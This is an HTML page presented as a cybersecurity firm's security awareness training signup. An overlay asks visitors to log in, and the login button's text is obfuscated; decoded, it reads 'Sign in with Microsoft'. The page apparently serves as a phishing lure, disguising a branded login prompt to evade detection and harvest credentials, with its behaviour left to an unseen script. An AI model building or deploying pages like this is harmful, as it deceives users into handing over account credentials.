<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://assets.calendly.com/assets/external/widget.css" rel="stylesheet">
    <script src="https://assets.calendly.com/assets/external/widget.js" type="text/javascript"></script>
    
    <title>Etech IT - Cybersecurity Solutions</title>
    <link rel="icon" type="image/x-icon" href="/primary/images/favicon.ico">
    <link rel="stylesheet" href="/primary/styles.css">

</head>
<body>
    <header>
        
        <div id="logo">Etech IT</div>
        <nav>
            <a href="#">Home</a>
            <a href="#">Services</a>
            <a href="#">About</a>
            <a href="#">Contact</a>
        </nav>
        <div id="contact">Contact us: +1 (123) 456-7890</div>
    </header>

    <main>
        <section id="hero">
            <h1>Welcome to Etech IT - Cybersecurity Solutions</h1>
            
            <p>Your trusted partner in cybersecurity solutions.</p>
        </section>

        <section id="registration-form-section">
            <section id="training-info">
                <h2>Upcoming Security Awareness Training</h2>
                
                <p>Join our exclusive 1:1 training session to enhance your security skills and awareness.</p>
                
            </section>

            <div id="primary-overlay-container">
                <div id="paywall-modal">
                    <h3 id="lg-h">This training is exclusive for enterprise customers</h3>
                    <p id="lg-p">If you received an invitation, please login to continue.</p>
                    
                    <button id="login-btn"><img id="lgImg" src="/primary/images/logo.svg"></img>OBFS==Adm92cvJ3Yp1EIoRXa3BibpBibnl2UEND</button>
                </div>

            </div>

            <iframe id="calendly-frame" src="" frameBorder="0" width="100%" height="100%" title="Select Date & Time - Etech-it.com"></iframe>
            
        </section>
    </main>

    <footer>
        <p>&copy; 2023 Etech IT. All rights reserved.</p>
        <nav>
            <a href="#">Privacy Policy</a>
            <a href="#">Terms of Service</a>
        </nav>
    </footer>

    <script src="/primary/script.js"></script>

</body>
</html>
